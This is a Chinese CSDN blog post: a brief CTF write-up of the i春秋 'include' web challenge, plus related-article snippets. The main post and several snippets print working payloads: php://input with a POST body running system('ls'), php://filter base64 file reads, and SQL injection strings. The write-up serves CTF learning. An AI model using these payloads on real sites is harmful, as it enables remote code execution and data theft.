i春秋 CTF慢慢爬行之路（1）

最新推荐文章于 2022-12-03 01:26:47 发布

drejun

最新推荐文章于 2022-12-03 01:26:47 发布

阅读量639

点赞数

分类专栏： CTF

本文链接：https://blog.csdn.net/drejun/article/details/80419667

版权

CTF 专栏收录该内容

2 篇文章 0 订阅

订阅专栏

“百度杯”CTF比赛 2017 二月场

类型：Web 题目名称：include

刚进来只看到一个PHP页面和部分PHP代码，看看提示内容，文件包含漏洞。

不多说，用火狐hackbar直接构造：

？path=php://input

post内容：<?php echo system('ls');?>

会爆出具体有哪些文件。

再通过?path=php://filter/read=convert.base64-encode/resource=dle345aae.php

查看dle345aae.php文件中有些什么东西

得到一个字符串，由后面的“=”可以判断是Base64编码，通过Base64解码就能拿到flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

drejun

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
i春秋 CTF慢慢爬行之路（1）

“百度杯”CTF比赛 2017 二月场
复制链接

扫一扫

专栏目录

Web-SQLi[i春秋][200pt]

Laurel_60的博客

08-04

1360

打开网址，是个登陆界面。根据题目，第一反应–怕不是sql注入哦！经过尝试之后会发现，username=admin时，返回的是password error。ok，日常抓包，然后用intruder看看有没有字符被过滤掉。事实证明，这个%有着大大的问题。拜读了网上的各种wp之后，原来是spintf()函数格式化字符串，导致了单引号逃逸。通过构造- - username=admin%1$\'...

i春秋 CTF大本营竞赛训练营 200+道题目答案

03-30

i春秋 CTF大本营竞赛训练营 200+道题目答案竞赛包括冬令营白帽黑客专项训练赛之春秋杯等国内比较好的安全知识在线学习平台，把复杂的操作系统、工具和网络环境完整的在网页进行重现，为学习者提供完全贴近实际...

参与评论您还未登录，请先登录后发表或查看评论

CTF之路

Sallyyym的博客

04-19

961

今天做了一个Misc音频隐写题目首先分享一个隐写工具MP3Stego，附上下载地址呀：https://www.petitcolas.net/fabien/software/ 接下来放题哈哈（此处不知道怎么传音频……）那就大概说步骤吧下载解压MP3Stego，打开到Decode.exe Encode.exe 目录（将音频下载到该目录哦）快捷键ctrl+R键，输入cmd 然后cd /d...

CTF 之路

weixin_51481155的博客

12-03

125

探索之路

[WUSTCTF2020]爬

zip471642048的博客

06-23

312

题目地址 : https://buuoj.cn/challenges#[WUSTCTF2020]%E7%88%AC 把图片删除后，得到一串16进制数

i春秋-Web(一)

qwzf

09-02

1358

前言做了几道i春秋的Web题，所以总结一下。 Web1：爆破-1 题目提示：某六位变量。查看题目，发现是代码审计 <?php include "flag.php"; $a = @$_REQUEST['hello'];//以get或post传入hello，并赋值给`$a` if(!preg_match('/^\w*$/',$a )){//正则表达式^匹配一行的开头，$表示结束。\w表示匹...

10-05

02-23

2021 N1CTF CTF 真题.zip

12-07

2021 N1CTF CTF 真题

CTF之二维码扫描.7z

12-02

这个"CTF之二维码扫描.7z"压缩包显然与CTF比赛中的一个环节有关，即二维码扫描。二维码在现代生活中无处不在，它们可以存储各种信息，如网址、文本、联系人信息等。在CTF竞赛中，二维码可能被用作隐藏线索或加密信息...

i春秋【SQL】

weixin_44722125的博客

05-21

473

看几列 http://ffe4385f12ad428598cb9253dca3c3c0e664b023f3c64632.changame.ichunqiu.com/index.php?id=1 union sele<>ct 1,2,3--+ 爆数据库 http://ffe4385f12ad428598cb9253dca3c3c0e664b023f3c64632.changame.ic...

i春秋登录

weixin_30701575的博客

09-16

1247

打开是个普普通通的表单提交网页查看源码，没什么东西抓包试试再没找到什么有用的信息尝试注入用户名admin’or ‘1’=’1 密码随便输弹出密码错误再试试admin’or ‘1’=’2 弹出用户不存在说明这里存在注入点，而且是盲注构造payload：admin' or user() regexp '^a'%23 （使用java的正则表达式来进行盲...

i春秋Login

weixin_30701575的博客

08-07

350

打开是个很普通的登录网页查看源码看看有没有东西找到绿色的提示，可能是账号密码，试试成功进来了，再右键源码，没东西。。。抓包试试，传repeater里go一下发现一个奇怪的变量，在request中传入其他值试试 show:1 Go一下，弹出一堆flag获取信息 <?php include 'common.php'; $re...

利用简易爬虫完成一道基础CTF题

weixin_30691871的博客

11-27

260

利用简易爬虫完成一道基础CTF题声明：本文主要写给新手，侧重于表现使用爬虫爬取页面并提交数据的大致过程，所以没有对一些东西解释的很详细，比如表单，post，get方法，感兴趣的可以私信或评论给我。如果文中有哪些问题，也欢迎大家指正。 Written by Menglin Ma 写在前面如果有想学习基础爬虫的同学，建议在中国大学MOOC上搜索嵩天老师的爬虫课程，讲的真的很细致，也很基...

i春秋-web-include

a3uRa的一个窝

10-06

531

phpinfo内容发现allow_url_include开启即允许php://input的形式，并将post的数据，作为php代码执行 ?path=php://input post:<?php system("ls");?> 得到 dle345aae.php index.php phpinfo.php 猜测flag应该在dle345aae.php里面 post:<?php s...

i春秋之春秋争霸

NeverLand

02-14

2709

这套题其实涉及技术方面比较少，都是些脑洞题，关键点是要学会思考题意+百度吧。感觉这套题出的没有戏说春秋好，不难，花了半小时（时间都在试+baidu上）~ 第一关一看~洛书~然后就没有然后了~ 答案：15 第二关根据提示还是洛书相关，四位全是[阴，阳]的密码。洛书的答案是15，想到大圈小圈，可能是二进制，15的二进制是1111，对比阴阳，1=阳，0=阴。

i春秋 CTF慢慢爬行之路（2）

drejun的博客

05-23

1040

“百度杯”CTF比赛 2017 二月场类型：Web题目名称：Zone根据题目提示的Zone，发现cookie中的值为0；将其设置为”1“然后刷新；利用php://filter文件流读取发现失败。随后访问：http://fa7767f78ffe41fd8e4256927003049e576a28d79f444eaf.game.ichunqiu.com/manages/admin.php?module...

i春秋_真的很简单_过程记录（坑吐了。。。）

等风来

09-19

9708

0x01 打开实验环境，根据提示打开实验工具dedeCMS （坑一）等等，我的工具呢？？？在实验环境里提供的工具中有个dedecms5.7但是不好用啊 WTF？？？实在不行去网上搜了下攻略，发现要自己下载dedecms，一点提示都没有，，，好坑啊如图，得到网站管理员账号密码后面的明显是md5加密后的密码，不过数了数只有20位，百度后得知dedecms的特点就是这样在线破...

i春秋-敲击-flag{xvzoc}

hkk1151043545的博客

11-01

499

方方格格，不断敲击 “wdvtdz qsxdr werdzxc esxcfr uygbn” flag格式为：flag{小写的字符串} 密文全是小写字母，提示是方格、敲击，想到经常使用的九键键盘，但是这样 26 个字母对应九键有点不对，那就可能是 26 键。迟迟找不到规律，发呆的时候，想看一下敲击键盘的规律，结果发现敲击顺序会形成字母分别对应 x v z o c ...

信安之路2017：安全学习与经验分享

"信安之路 2017 年刊" 《信安之路 2017 年刊》是一部全面记录信息安全领域的专业出版物，它涵盖了2017年度在信息安全学习、研究、实践和竞赛等多个方面的内容。这本书旨在分享安全专家和爱好者们的实践经验，帮助...